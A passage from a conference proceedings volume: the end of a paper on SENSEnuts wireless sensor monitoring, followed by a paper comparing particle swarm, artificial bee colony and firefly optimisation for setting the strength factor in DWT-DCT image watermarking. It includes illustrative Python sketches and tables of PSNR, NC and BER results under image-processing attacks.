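To make the three-plane interpretation concrete, the following minimal sketch converts raw triaxial accelerometer samples into tilt (pitch/roll) angles; the sample values and the ±2g, 8-bit scaling are illustrative assumptions, not the GAP sensor's actual register map or driver API.

import math

def tilt_angles(ax, ay, az):
    """Return (pitch, roll) in degrees from acceleration expressed in g units."""
    pitch = math.degrees(math.atan2(ax, math.sqrt(ay * ay + az * az)))
    roll = math.degrees(math.atan2(ay, math.sqrt(ax * ax + az * az)))
    return pitch, roll

def raw_to_g(raw, full_scale_g=2.0, bits=8):
    """Convert a signed raw sample to g, assuming a symmetric full-scale range."""
    return raw * full_scale_g / (2 ** (bits - 1))

# Assumed raw 8-bit samples: node lying flat (az about 1 g) versus tilted on its side.
for sample in [(0, 0, 64), (45, 0, 45)]:
    g = tuple(raw_to_g(v) for v in sample)
    print(sample, "->", [round(a, 1) for a in tilt_angles(*g)])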

4.2 Monitoring

The real-time sensor nodes are connected to the coordinators, which are an essential
part of the monitoring process. The GAP sensor node gets us the values of change in
orientational acceleration and positioning, which could be used for sensing real-time
activity. Similarly, the TL sensor node gives us real-time readings for temperature
and light sensing, which could eventually prove beneficial for smart home system
technology through live updating and reading from the TL sensor node to the user
system interface. Another important part of this SENSEnuts platform is the radio
module, which is used to send data to the PAN coordinator. This PAN coordinator,
with the help of the Wi-Fi module, can then help us display the live readings from
the real-time sensor on the senselive GUI. In this way, this method is cost effective,
uses less power, and proves to be helpful in remote monitoring.

Fig. 10 Senselive data of GAP sensor for orientation 1

Fig. 11 Senselive data on GAP sensor for orientation 2

Fig. 12 Senselive data on GAP sensor for orientation 3

Fig. 13 Senselive data on GAP sensor for orientation 4

5 Conclusion

In this work, we have used the concept of connecting the sensor world to the IoT
in a hassle-free manner and with high precision and accuracy using a wireless sensor
network (WSN). The data coming from the real-time sensors can be easily sensed
and used for future applications.

Fig. 14 Senslive data on GAP sensor for orientation 5

The proposed work proved to be hassle free in comparison to the conventional
triaxial accelerometric three-plane detection system, with a lot less computational
complexity, no neural network modeling, easy live
updating on the senslive GUI, and easy forwarding to the cloud for further usage.
Small changes in temperature, acceleration, luminosity, humidity, and pressure were
detected with only a small delay on the cloud end at the time of updating the real-time
data from the sensor nodes to the senslive GUI. In this way, the wireless sensor
network built with the SENSEnuts hardware package and its GUIs proves to be very
user-friendly, cost effective, and low power consuming, and it gives us an edge over
conventional hardware implementation technologies, whether in the field of detecting
object acceleration or motion or in smart home systems for detecting and monitoring
light and temperature for user-friendly system applications. In the future, we can
improve the limited range by using a multi-hop communication system and suitable
routing protocols so that the data packets can easily reach the destination, and we
can also send this real-time senslive GUI data to any cloud service for its usage over
the Internet from very distant places.

References

1. Jalal, A., Majid, A. K. Q., & Sidduqi., M. A. A triaxial based human motion detection for
ambient smart home systems. In IBCAST. https://doi.org/10.1109/IBCAST.2019.8667183.
2. Khan, A. M., Lee, Y. K., Lee, S. Y., & Kim, T. S. (2010). A triaxial accelerometer-based
physical-activity recognition via augmented-signal features and a hierarchical recognizer. IEEE
Transactions on Information Technology in Biomedicine, 14(5), 1166–1172. https://doi.org/10.
1109/titb.2010.2051955
3. Haswani, N. G., & Deore, P. J. (2018). Web-based realtime underground drainage or sewage
monitoring system using wireless sensor networks. In 2018 Fourth International Conference
on Computing Communication Control and Automation (ICCUBEA) (pp. 1–5)

4. Estrada-Lopez, J. J., Castillo-Atoche, A. A., Vazquez-Castillo, J., & Sanchez-Sinencio, E.


(2018). Smart soil parameters estimation system using an autonomous wireless sensor network
with dynamic power management strategy. IEEE Sensors Journal, 18(21), 8913–8923. https://
doi.org/10.1109/jsen.2018.2867432
5. Thyagarajan, J., & Sundararaja, S. (2018). Energy aware corona level based routing approach
for IEEE 802.15.4 based wireless sensor networks. International Journal of Pure and Applied
Mathematics, 120(5), 1275–1295.
6. Agarwal, S., Payal, A., & Reddy, B. V. R. (2017). Design and implementation of medium
access control based routing on real wireless sensor networks testbed. International Journal of
Computer and Information Engineering, 11(6), 670–678.
7. Ray, P. P. (2016). An Internet of Things based approach to thermal comfort measurement and
monitoring. In 3rd International Conference on Advanced Computing and Communication
Systems (ICACCS) (pp. 1–7)
8. Han, X., Cao, X., Lloyd, E. L., & Shen, C. (2007). Fault-tolerant relay node placement in
heterogeneous wireless sensor networks. In IEEE INFOCOM 2007—26th IEEE International
Conference on Computer Communications (pp. 1667–1675).
9. Misic, J., Misic, V. B., & Shafi, S. (2004). Performance of IEEE 802.15.4 beacon enabled
PAN with uplink transmissions in non-saturation mode-access delay for finite buffers. In First
International Conference on Broadband Networks (pp. 416–425)
10. Ting, K. S., Ee, G. K., Ng, C. K., Noordin, N. K., & Ali, B. M. (2011). The performance
evaluation of IEEE 802.11 against IEEE 802.15.4 with low transmission power. In The 17th
Asia Pacific Conference on Communications (pp. 850–855).
11. Sun, Y., Li, L., & Luo, H. (2011). Design of FPGA-based multimedia node for WSN. In 7th
International Conference on Wireless Communications, Networking and Mobile Computing
(pp. 1–5).
12. Yuan, W., Wang, X., & Linnartz, J. M. G. (2007). A coexistence model of IEEE 802.15.4 and
IEEE 802.11 b/g. In 14th IEEE Symposium on Communications and Vehicular Technology in
the Benelux (pp. 1–5).
13. Yuan, W., Linnartz, J. M. G., & Niemegeers, I. G. M. M. (2010). Adaptive CCA for
IEEE 802.15.4 wireless sensor networks to mitigate interference. In 2010 IEEE Wireless
Communication and Networking Conference (pp. 1–5).
14. Zou, Y., & Wang, G. (2016). Intercept behavior analysis of industrial wireless sensor networks
in the presence of eavesdropping attack. IEEE Transactions on Industrial Informatics, 12(2),
780–787.
15. Heo, J., Hong, J., & Cho, Y. (2009). EARQ: Energy aware routing for real-time and reli-
able communication in wireless industrial sensor networks. IEEE Transactions on Industrial
Informatics, 5(1), 3–11. https://doi.org/10.1109/tii.2008.2011052
16. Chan, K., Cheang, C., & Choi, W. (2014). ZigBee wireless sensor network for surface
drainage monitoring and flood prediction. In 2014 International Symposium on Antennas and
Propagation Conference Proceedings (pp. 391–392).
17. Akhondi, M. R., Talevski, A., Carlsen, S., & Petersen, S. (2010) The role of wireless sensor
networks (WSNs) in industrial oil and gas condition monitoring. In 4th IEEE International
Conference on Digital Ecosystems and Technologies (pp. 618–623).
Comparative Analysis: Role
of Meta-Heuristic Algorithms in Image
Watermarking Optimization

Preeti Garg and R. Rama Kishore

Abstract The aim of watermarking is to provide copyright protection and authentication
to the digital contents available over the network. A good quality watermarking
scheme should provide a balance between various characteristics of watermarking.
In this paper, a DCT and DWT based hybrid watermarking system is implemented
to provide copyright protection to the content and is secured by using Arnold trans-
form. The paper’s objective is to study and analyze the performance of various meta-
heuristics algorithms in the watermarking field. This paper shows the performance
of particle swarm, artificial bee colony, and firefly algorithms against digital image
watermarking. These algorithms are used to find the optimal value of the watermark
strength factor, which is responsible for providing the balance between robustness
and imperceptibility. The proposed scheme shows good performance in terms of
PSNR, NC, and BER values. For providing security to the watermark image, the
image is scrambled by using the Arnold transform. The robustness of the scheme is
evaluated against different types of image processing attacks.

Keywords Digital watermarking · Meta-heuristic optimization · ABC · Firefly · PSO

P. Garg (B) · R. Rama Kishore
University School of Information and Communication Technology, Guru Gobind Singh
Indraprastha University, Dwarka, New Delhi, India
P. Garg
Department of CSE, KIET, Ghaziabad, India

1 Introduction

Copyright protection of digital contents is essential to achieve legal ownership over
that information. Watermarking is one technique that helps the owners have their
rights over their own content, which they can use to protect the content from
unauthorized modification. Watermarks are the information added over any digital content

which can be used for authentication purpose. A watermark can be visible to end-
users like, while creating a video using any application that application adds its logo
over that video. But these visible watermarks can be deleted quickly by using Photo-
shop, and these also decreased the quality of the content. Most people use invisible
watermarks so that these can’t be visible to anyone and still serve their purpose. The
basic phenomenon of watermarking is to add an image, text, logo, or information to
cover data to provide intellectual property rights to that content. This logo can be
extracted when required to fulfill the task [1]. While adding a watermark to the cover
content, the original image’s quality should not degrade, and it should be recoverable
after various attacks applied over the content [2, 3].
There are various watermarking applications like copyright protection, broadcast
monitoring, fingerprinting, and medical applications [4-7], which attract researchers
to work in this field. Nowadays, watermarking is being used in medical fields to
protect the confidential information of patients. Watermarking can be performed
in the spatial domain [8-10] or in the frequency domain [11-14]. But nowadays
mostly frequency-domain techniques are being used, as these provide better robustness
to the watermark added to the image. To provide a good balance between imperceptibility
and robustness, combinations of frequency-domain techniques like DFT and DCT
based [15], DFT, DWT, SVD [16], and DWT, DCT [17] are being used. The quality
of the watermarking scheme (known as imperceptibility) is measured by calculating its
PSNR value [18] and MSE, while its robustness against various attacks is measured
using normalized correlation (NC) [19] and bit error rate (BER). It is very hard for
an algorithm to maintain the original image's quality while providing good behavior
against various attacks. So an optimization procedure is required to achieve this
objective; one of the techniques to perform optimization is called nature-inspired
optimization. As the name suggests, these algorithms are inspired by the natural
behavior of the species available in nature, like honey bees, ants, cuckoos, bats, etc.
Many nature-inspired algorithms have been used in the watermarking field [20-24]
to optimize the scheme to find the balance and maintain the quality of the image.
This paper aims to study and analyze the behavior of these meta-heuristic algorithms in the watermarking procedure. For this purpose, a watermark is added to the cover image using a hybrid scheme in the frequency domain with 1-level DWT and DCT. The scheme is then optimized using three different meta-heuristic algorithms: firefly, artificial bee colony, and particle swarm optimization. Here, these algorithms are used to find the strength factor used in the watermark embedding procedure, which is crucial in providing the trade-off between quality and robustness. The proposed scheme is a blind technique that does not require the original image or watermark at the time of extraction, making it more secure.
The rest of the paper is organized as follows: Sect. 2 describes various works done on the optimization of the watermarking procedure. Section 3 describes the proposed embedding and extraction algorithm. The experimental results are discussed in Sect. 4, and Sect. 5 presents the comparative analysis. Section 6 concludes the proposed work and outlines some future directions.

Table 1 Parameters used in various optimization algorithms

| PSO algorithm | ABC algorithm | Firefly algorithm |
|---|---|---|
| Max_iter: 50 | Max_iter: 50 | Max_iter: 50 |
| Population size: 100 | Population size: 100 | Population size: 100 |
| Lower bound: 25 | Lower bound: 25 | Lower bound: 25 |
| Upper bound: 35 | Upper bound: 35 | Upper bound: 35 |
| Inertia max = 1.1 | Food source: 200 | Alpha = 0.01 |
| Inertia min = 0.1 | Limit: 100 | Beta = 1 |
| Correlation factor 1 = 1.49 | | Gamma = 1 |
| Correlation factor 2 = 1.49 | | Theta = 0.97 |

2 Related Work

A number of nature-inspired algorithms use swarm intelligence concepts to optimize results, such as the genetic algorithm, firefly algorithm, gray wolf optimization, bat optimization, particle swarm optimization, artificial bee colony, ant colony optimization, and many more. Several authors have used these schemes to optimize their results according to their needs. A new optimized function is described in [25], which provides robustness against various attacks while maintaining a predefined quality; in this scheme, the ABC algorithm has been used to calculate the embedding factor, which is derived from PSNR and BCR (Bit Correction Rate) values. Researchers have used hybrid techniques for embedding the watermark and different nature-inspired algorithms for providing the optimization. In [26], a multi-optimized watermarking scheme using the bat algorithm and firefly algorithm has been implemented for color images. Another watermarking scheme based on DCT transformation is explained in [27], which uses the PSO algorithm to optimize the strength factor value; there, regression-kernel-based extreme learning machine is used. A watermarking scheme optimized using a modified whale algorithm is proposed in [28]; in this scheme, DWT-SVD-based watermarking is performed, which uses modified whale optimization for finding the multiscale factor. A firefly-algorithm-based optimization is used in [29], where the firefly algorithm is used to find the embedding location for the watermark. A distinct discrete firefly algorithm is used in [30] for choosing the optimal blocks for embedding, and the Hadamard transform is used for watermark embedding in the frequency domain; in this scheme, the original image is first converted into blocks of size 8*8, the Hadamard transform is applied on these blocks, and the watermark is embedded only on positive Hadamard coefficients. An ABC-algorithm-based optimization technique is implemented in [22], which uses IWT and SVD to embed the watermark. The authors in [26] have also used the firefly algorithm for optimizing the watermarking results. In the proposed work, the optimization process is performed using the firefly, ABC, and PSO algorithms.
The firefly algorithm is based on the flashing behavior of fireflies; in this algorithm, it is assumed that fireflies are attracted towards each other [30]. The artificial bee colony (ABC) algorithm was introduced in [31] and uses the concept of the intelligence of honey bees. In [32], the authors described the ABC algorithm based on honey bees' foraging behavior, i.e., how honey bees find their food collectively. One of the advantages of the ABC algorithm is that it is faster than other heuristic techniques, as it uses fewer control parameters [33]. The PSO algorithm, proposed by Kennedy and Eberhart [34], is an iterative optimization technique; PSO is a swarm-based search process used for optimization purposes [35].
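To make the role of these optimizers concrete, the following is a minimal sketch (not the authors' implementation) of how a PSO search over a single scalar strength factor could be organized, using the bounds, population size, iteration count, inertia range, and correlation factors listed in Table 1. The `fitness` callback is a placeholder for the PSNR/NC-based objective discussed in Sect. 4.

```python
import random

def pso_strength_factor(fitness, lb=25.0, ub=35.0, pop=100, max_iter=50,
                        w_max=1.1, w_min=0.1, c1=1.49, c2=1.49):
    """Particle swarm search for a scalar embedding strength factor.

    `fitness` is assumed to return a value to MAXIMISE (e.g. a weighted
    combination of PSNR and NC after embedding, attacking and extracting).
    """
    x = [random.uniform(lb, ub) for _ in range(pop)]   # particle positions (candidate SFs)
    v = [0.0] * pop                                    # particle velocities
    pbest = x[:]                                       # personal best positions
    pbest_f = [fitness(xi) for xi in x]
    g = max(range(pop), key=lambda i: pbest_f[i])
    gbest, gbest_f = pbest[g], pbest_f[g]

    for it in range(max_iter):
        w = w_max - (w_max - w_min) * it / max_iter    # linearly decaying inertia weight
        for i in range(pop):
            r1, r2 = random.random(), random.random()
            v[i] = (w * v[i] + c1 * r1 * (pbest[i] - x[i])
                    + c2 * r2 * (gbest - x[i]))
            x[i] = min(ub, max(lb, x[i] + v[i]))       # keep SF inside [lb, ub]
            f = fitness(x[i])
            if f > pbest_f[i]:
                pbest[i], pbest_f[i] = x[i], f
                if f > gbest_f:
                    gbest, gbest_f = x[i], f
    return gbest, gbest_f

# toy objective only for illustration; the real one embeds, attacks, and measures PSNR/NC
print(pso_strength_factor(lambda sf: -(sf - 30.0) ** 2))
```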

3 Proposed Technique

The proposed scheme is a blind watermarking technique that provides the robustness, imperceptibility, and security characteristics of digital watermarking. In this paper, a grayscale image of size 512*512 is taken as the input or cover image, on which the watermark logo is embedded using the DWT technique. DWT converts an image into hierarchies of information in both the spatial and the frequency domain [36]. Firstly, DWT is applied to the cover image, and then it is performed again on the LL sub-band of size 128*128. The LL1 sub-band is then chosen to embed the watermark; the reason for choosing the LL sub-band for embedding is that LL represents the image's low-resolution content. DCT (Discrete Cosine Transform) is applied on the LL1 sub-band; DCT is a linear orthogonal transformation widely used in digital image processing [37]. The watermark logo is scrambled using the Arnold transform and then embedded into the DCT of the LL1 sub-band to provide security to the scheme. The proposed scheme is optimized using multi-objective-function-based meta-heuristic algorithms, namely the PSO, ABC, and firefly algorithms. The proposed method is a blind watermarking technique because it requires only the watermarked image at the time of extraction, making it a secure scheme.
Table 1 shows the initial parameters used in all three optimization algorithms; standard parameters such as the population size and number of iterations are the same for all three. The watermark embedding and extraction procedure is shown in Algorithm 4. This section describes the algorithm used for embedding the watermark in the grayscale image of size 512*512 and its extraction process. All the experiments are performed on the Lena image as the cover image, and a logo image of size 64*64 is used as the watermark. Extraction of the watermark is done blindly, as it requires only the embedded image and not the original cover or watermark image; only the key used to encrypt the watermark is needed to decrypt it after extraction. The complete process of watermark embedding and extraction is shown in Fig. 1. During embedding, different scaling factors are used, calculated using the three meta-heuristic techniques.
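Since the watermark is secured with the Arnold transform, a small illustrative sketch of the standard 2D Arnold cat map on a square image is given below. This is a generic implementation, not taken from the paper, and the iteration count acting as the key is a placeholder.

```python
import numpy as np

def arnold_scramble(img, iterations):
    """Scramble a square image with the Arnold cat map.

    Each iteration maps (x, y) -> ((x + y) mod N, (x + 2y) mod N);
    `iterations` plays the role of the secret key.
    """
    n = img.shape[0]
    assert img.shape[0] == img.shape[1], "Arnold map needs a square image"
    out = img.copy()
    for _ in range(iterations):
        scrambled = np.empty_like(out)
        for x in range(n):
            for y in range(n):
                scrambled[(x + y) % n, (x + 2 * y) % n] = out[x, y]
        out = scrambled
    return out

def arnold_unscramble(img, iterations):
    """Invert the scrambling by applying the inverse mapping the same number of times."""
    n = img.shape[0]
    out = img.copy()
    for _ in range(iterations):
        restored = np.empty_like(out)
        for x in range(n):
            for y in range(n):
                restored[x, y] = out[(x + y) % n, (x + 2 * y) % n]
        out = restored
    return out

wm = np.random.randint(0, 2, (64, 64))   # 64*64 binary watermark, as in the paper
assert np.array_equal(wm, arnold_unscramble(arnold_scramble(wm, 10), 10))
```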
Algorithm 4: Steps of proposed approach
Fig. 1 Block diagram of the proposed scheme: the cover image undergoes DWT, block division, and DCT on the LL1 sub-band; the Arnold-scrambled watermark is embedded bitwise using a scaling factor obtained from PSO, ABC, or firefly; inverse DCT and inverse DWT then yield the watermarked image, and extraction reverses the block division and DCT steps to recover the watermark

Embedding:
1. Read the cover image of size m*n and perform 1-level DWT on it to convert it into 4 equal-sized sub-bands:
   [LL1, HL1, LH1, HH1] = DWT((I)m,n)
   where LL1, HL1, LH1, and HH1 are the 4 sub-bands arranged in increasing order of frequency and (I)m,n is the original cover image of size m*n.
2. Select the LL1 sub-band of the host image, as it holds most of the cover image information, and convert it into blocks of size 4*4.
3. Perform block-wise DCT on every block obtained in step 2.
4. Read the 64*64 watermark image and scramble it using the Arnold transform to provide security to the watermark image.
5. Convert the scrambled watermark into a vector so that bitwise watermark embedding can be performed on each block of size 4*4.
6. Choose a location in each block, based on its frequency content, to embed the watermark. Watermark bits are embedded by adding or subtracting a watermark strength factor obtained by applying the meta-heuristic algorithms. This value of the embedding factor is calculated using the firefly, PSO, and ABC algorithms and is then used, one by one, for embedding the watermark bits. The watermark is embedded using the following rule:
   If SW(i) = 1: bx(i,j) = bx(i,j) - SF
   else if SW(i) = 0: bx(i,j) = bx(i,j) + SF
   where bx(i,j) is the location selected in the block for embedding and SF is the robustness factor or embedding strength factor calculated using the artificial bee colony, firefly, and particle swarm optimization techniques. The process of computing the embedding factor using these algorithms is described in Sect. 3. The locations used for embedding act as the key values to be used at the time of watermark extraction.
7. Combine the blocks back into a block of size 256*256 and perform inverse DCT (IDCT) on it to get the image in the spatial domain.
8. The embedded LL1 sub-band is then combined with the other sub-bands by applying IDWT to obtain the watermarked image.

Extraction:
1. Read the watermarked image and perform 2-D DWT on it:
   [LL1, HL1, LH1, HH1] = DWT(Ewk)
2. Perform block-wise DCT on the LL1 sub-band and divide the image into blocks of size 4*4, as in the embedding algorithm.
3. Find the coefficient value of each selected block location used for embedding and apply
   if pix >= 0: wm(i,j) = 0
   else if pix < 0: wm(i,j) = 1
   where wm(i,j) is the pixel value of the watermark image at location (i, j).
4. Combine all the results obtained in step 3 into a vector. The image obtained is the scrambled watermark image; it is then unscrambled using the key used when embedding it. The resulting image is the extracted watermark, which is compared with the original watermark to check robustness and imperceptibility.
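As a hedged illustration of steps 5-6 of the embedding and step 3 of the extraction, the sketch below applies the add/subtract rule to a single 4*4 block. The coefficient position `POS` and the strength factor are placeholders, and a flat demonstration block is used so that the selected coefficient starts near zero; in the actual scheme the blocks come from the DCT of the LL1 sub-band.

```python
import numpy as np
from scipy.fft import dctn, idctn

POS = (2, 2)   # hypothetical mid-frequency position inside each 4*4 block

def embed_bit(block, bit, sf):
    """Embed one scrambled-watermark bit into a 4*4 spatial block (steps 5-6)."""
    coeffs = dctn(block, norm="ortho")
    # bit 1 -> subtract the strength factor, bit 0 -> add it (the paper's rule)
    coeffs[POS] = coeffs[POS] - sf if bit == 1 else coeffs[POS] + sf
    return idctn(coeffs, norm="ortho")

def extract_bit(block):
    """Blind extraction rule (extraction step 3): the coefficient's sign gives the bit."""
    coeffs = dctn(block, norm="ortho")
    return 0 if coeffs[POS] >= 0 else 1

# flat block: all non-DC coefficients are zero, so the rule can be demonstrated cleanly
blk = np.full((4, 4), 128.0)
for b in (0, 1):
    assert extract_bit(embed_bit(blk, b, sf=30.0)) == b
```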

4 Results and Discussion

The proposed scheme is evaluated on the Lena grayscale image of size 512*512, as shown in Table 2. All the experiments are implemented in MATLAB R2020a with 4 GB RAM and an Intel® Core™ processor. For embedding, a watermark logo image of size 64*64 is used. The watermarking scheme is optimized using different nature-inspired algorithms to optimize the results for robustness and imperceptibility. Different attacks are applied to the watermarked image with the parameters shown in Table 3. The scheme's objective is to make the watermarked image robust against these different types of image processing, geometric, and noise attacks while maintaining its perceptual quality. For this reason, both the NC value and the PSNR value take part in the objective function of the swarm intelligence algorithms, as shown in Eq. 1. The proposed scheme is evaluated using two measures.
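Equation 1 itself is not reproduced in this excerpt, so the following sketch only illustrates one plausible shape such a multi-objective fitness could take: a weighted combination of the PSNR of the watermarked image and the average NC of the watermarks extracted after a set of attacks. The weights, the attack list, and all helper callbacks are hypothetical, not the paper's actual formulation.

```python
def fitness(sf, cover, watermark, embed, extract, attacks, psnr, nc, w1=1.0, w2=100.0):
    """Hypothetical multi-objective fitness for a candidate strength factor `sf`.

    `embed`, `extract`, `psnr`, `nc`, and the `attacks` list are assumed to be
    supplied by the watermarking pipeline; larger return values are better.
    """
    marked = embed(cover, watermark, sf)
    imperceptibility = psnr(cover, marked)
    robustness = sum(nc(watermark, extract(atk(marked))) for atk in attacks) / len(attacks)
    return w1 * imperceptibility + w2 * robustness
```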

Table 2 PSNR values of different images (original and watermarked image thumbnails not reproduced)

| Algorithm name | Image name | PSNR value |
|---|---|---|
| PSO | Lena | 35.1205 |
| ABC | Lena | 38.1308 |
| Firefly | Lena | 38.5020 |
| PSO | Pepper | 36.5171 |
| ABC | Pepper | 35.1243 |
| Firefly | Pepper | 36.5200 |



4.1 Perceptual Quality Measurement

Perceptual quality means that once the watermark is embedded into the original image, it should not be visible to the end-user, and the embedded image should look like the original image [38, 39]. There are various measures used to quantify it, such as MSE (Mean Square Error) and PSNR (Peak Signal to Noise Ratio). PSNR is one of the most useful measures because it gives the statistical difference between the original cover image and the watermarked image [14]. The higher the PSNR value, the more invisible the watermark. Generally, a PSNR value of 27 is considered acceptable, which is achieved by the proposed scheme. A PSNR value greater than 35 is achieved for all the techniques used here, as shown in Table 2, proving that the proposed scheme is highly imperceptible.
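For reference, a minimal computation of MSE and PSNR for 8-bit images might look as follows (standard definitions, not code from the paper):

```python
import numpy as np

def psnr(original, watermarked, peak=255.0):
    """Peak signal-to-noise ratio (dB) between cover and watermarked images."""
    mse = np.mean((original.astype(np.float64) - watermarked.astype(np.float64)) ** 2)
    return float("inf") if mse == 0 else 10.0 * np.log10(peak ** 2 / mse)
```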

4.2 Robustness Measurement

Robustness refers to the watermark's capacity to withstand attacks, or equivalently the similarity between the original watermark image and the extracted watermark. There are various measures used to calculate robustness; one of these is BER (Bit Error Rate), which calculates the error rate between the original and extracted watermark images. The most common measure of watermark robustness is NC (Normalized Correlation) [40], which measures the correlation between the original and extracted watermark images. The higher the correlation between these two images, the closer the NC value is to 1. In this technique, both NC and BER values are calculated for all the attacks to measure the scheme's robustness. The NC values against various attacks are shown in Table 3, and the BER values in Table 4. An NC value greater than 0.9 is achieved for all the optimization techniques applied.
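One common way to compute these two robustness measures is sketched below; the paper does not spell out which exact NC normalization it uses, so this is only an assumed variant:

```python
import numpy as np

def normalized_correlation(w, w_ext):
    """NC between original and extracted watermarks; a value of 1 means identical."""
    w, w_ext = w.astype(np.float64), w_ext.astype(np.float64)
    return np.sum(w * w_ext) / np.sqrt(np.sum(w ** 2) * np.sum(w_ext ** 2))

def bit_error_rate(w, w_ext):
    """Fraction of watermark bits recovered incorrectly."""
    return np.mean(w.astype(bool) != w_ext.astype(bool))
```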

5 Comparative Analysis

The results of these optimization techniques are compared with each other in terms
of NC value and the BER values as shown in Figs. 2, 3, 4, and 5. It can be seen that the
results of applying each algorithm are different even though they all are performing
the same task. From all the experiments, we can summarize that the firefly algo-
rithm is very efficient in solving complex problems and converges faster than the
PSO algorithm and the artificial bee algorithm. Here, the term convergence means
the algorithm reaches the optimization results more quickly than the other two algo-
rithms. The reason for its faster convergence is that the firefly algorithm’s parameters
can be tuned to control the randomness as the number of iterations proceeds. The
time complexity of the firefly algorithm is better than the PSO algorithm as in PSO,
Table 3 NC values of extracted watermark images using various optimization techniques after performing various attacks

| S. No. | Attack type | Lena: PSO | Lena: ABC | Lena: Firefly | Pepper: PSO | Pepper: ABC | Pepper: Firefly |
|---|---|---|---|---|---|---|---|
| 1 | Median filtering (3*3) | 0.9820 | 0.9607 | 0.9607 | 0.9995 | 1 | 0.9995 |
| 2 | Average filtering (3*3) | 0.9684 | 0.9420 | 0.9420 | 0.9973 | 0.9995 | 0.9989 |
| 3 | Resizing | 0.9814 | 0.9587 | 0.9587 | 0.9995 | 0.9995 | 0.9995 |
| 4 | Rotation (20°) | 0.9902 | 0.9883 | 0.9883 | 1 | 1 | 1 |
| 5 | Histogram equalization | 0.9892 | 0.9793 | 0.9793 | 0.9979 | 0.9989 | 0.9984 |
| 6 | Gaussian noise (v = 0.001) | 0.9888 | 0.9424 | 0.9500 | 0.9973 | 0.9989 | 0.9995 |
| 7 | Weiner filter (2*2) | 0.9904 | 0.9689 | 0.9689 | 0.9989 | 1 | 1 |
| 8 | Gaussian average filtering | 0.9936 | 0.9824 | 0.9824 | 0.9995 | 1 | 1 |
| 9 | Average filtering (3*3) | 0.9720 | 0.9444 | 0.9444 | 0.9973 | 0.9995 | 0.9995 |
| 10 | Salt n pepper noise (0.001) | 0.9946 | 0.9752 | 0.9788 | 0.9872 | 0.9979 | 0.9931 |
| 11 | Sharpening (0.8) | 0.9968 | 0.9909 | 0.9909 | 1 | 1 | 1 |
| 12 | Speckle noise (0.001) | 0.9952 | 0.9872 | 0.9846 | 1 | 1 | 1 |
| | Average value | 0.9868 | 0.9683 | 0.9690 | 0.9978 | 0.9995 | 0.9990 |

its complexity depends on the number of iterations multiplied by the square of the population size. The ABC algorithm is very simple from a computational perspective and requires very few parameters to be initialized at the start. It also has a high probability of finding correct results, whereas for the PSO algorithm it is not guaranteed that it always converges to the global best solution. One of the advantages of the ABC algorithm is the abandonment concept used in it: if the employed bees are not able to improve a solution, they abandon that solution and transform into scout bees. The success rate of the ABC algorithm is higher than that of the PSO algorithm. One advantage of using the PSO algorithm for optimization is that it is very easy to implement and requires few parameters. From these experiments, it is apparent that all the optimization algorithms provide the right balance between imperceptibility and robustness.
Table 4 BER values of extracted watermark images using various optimization techniques after performing various attacks

| S. No. | Attack type | Lena: PSO | Lena: ABC | Lena: Firefly | Pepper: PSO | Pepper: ABC | Pepper: Firefly |
|---|---|---|---|---|---|---|---|
| 1 | Median filtering (3*3) | 0.0083 | 0.0183 | 0.0183 | 0.0002 | 0 | 0.0002 |
| 2 | Average filtering (3*3) | 0.0146 | 0.0276 | 0.0276 | 0.0012 | 0.0002 | 0.0005 |
| 3 | Resizing | 0.0085 | 0.0193 | 0.0193 | 0.0002 | 0.0002 | 0.0002 |
| 4 | Rotation (20°) | 0.0017 | 0.0054 | 0.0054 | 0 | 0 | 0 |
| 5 | Histogram equalization | 0.0049 | 0.0095 | 0.0095 | 0.0010 | 0.0005 | 0.0007 |
| 6 | Gaussian noise (v = 0.001) | 0.0051 | 0.0276 | 0.0237 | 0.0012 | 0.0005 | 0.0002 |
| 7 | Weiner filter (2*2) | 0.0044 | 0.0144 | 0.0144 | 0.0005 | 0 | 0 |
| 8 | Gaussian average filtering | 0.0029 | 0.0081 | 0.0081 | 0.0002 | 0 | 0 |
| 9 | Average filtering (3*3) | 0.0129 | 0.0264 | 0.0264 | 0.0012 | 0.0002 | 0.0002 |
| 10 | Salt n pepper noise (0.001) | 0.0024 | 0.0115 | 0.0100 | 0.0059 | 0.0010 | 0.0032 |
| 11 | Sharpening (0.8) | 0.0015 | 0.0042 | 0.0042 | 0 | 0 | 0 |
| 12 | Speckle noise (0.001) | 0.0022 | 0.0059 | 0.0071 | 0 | 0 | 0 |
| | Average value | 0.0057 | 0.0148 | 0.0145 | 0.0009 | 0.0001 | 0.0004 |

Fig. 2 NC value comparison chart for Pepper image (NC value vs. attack number for PSO, ABC, and Firefly)

Fig. 3 NC value comparison chart for Lena image (NC value vs. attack number for PSO, ABC, and Firefly)

Fig. 4 BER value comparison chart for Pepper image (BER value vs. attack number for PSO, ABC, and Firefly)

Fig. 5 BER value comparison chart for Lena image (BER value vs. attack number for PSO, ABC, and Firefly)

6 Conclusion

Watermarking is a technique that helps owners assert rights over their own content available over the network. The watermark added to the cover image should not degrade the original content's quality, and it should also be robust against several image processing attacks. The proposed watermarking scheme provides a good balance between the robustness and imperceptibility characteristics and provides security to the watermark. This study aims to analyze the performance of meta-
heuristic algorithms in the watermarking field and see how these can optimize the
watermark embedding and extraction process results. Here, these algorithms are used
to optimize the embedding strength factor used in the embedding process. From this
study, we can conclude that the firefly algorithm converges faster than the other two algorithms. The ABC algorithm requires very few initialization parameters, which makes it quicker to set up than the other algorithms. The results of the three algorithms differ even though they all perform the same task; this is because every algorithm has its own method of finding the global optimal solution. This analysis can help researchers choose among these algorithms according to their problem domain.
The proposed scheme provides a good balance between robustness and imperceptibility by optimizing the embedding strength factor using swarm intelligence algorithms. Embedding the watermark directly into the pixel values is not a robust method, which is why the embedding here is performed in the frequency domain of the cover image. The performance of the proposed scheme is evaluated using three parameters: PSNR, BER, and NC. The comparison between the three optimization techniques shows that the proposed methodology works well against most of the attacks and gives a PSNR value greater than 35 and an average NC value of 0.96 for all the algorithms. In future, work can be done to analyze other optimization approaches, such as further meta-heuristic or fuzzy-logic-based methods.

7 Conflict of Interest

The authors declare that they have no conflict of interest.

References

1. Ahmadi, S. B. B., Zhang, G., & Wei, S. (2019). Robust and hybrid SVD-based image watermarking schemes: A survey. Multimedia Tools and Applications. https://doi.org/10.1007/s11042-019-08197-6
2. Cayre, F., Fontaine, C., & Furon, T. (2005). Watermarking security: Theory and practice. IEEE
Transactions on Signal Processing, 53(10), 3976–3987.
3. Cox, I., Miller, M., Bloom, J., Fridrich, J., & Kalker, T. (2007). Digital watermarking and
steganography (pp. 61–102). San Mateo: Morgan Kaufmann.
4. Agarwal, N., Singh, A., & Singh, P. (2019). Survey of robust and imperceptible watermarking.
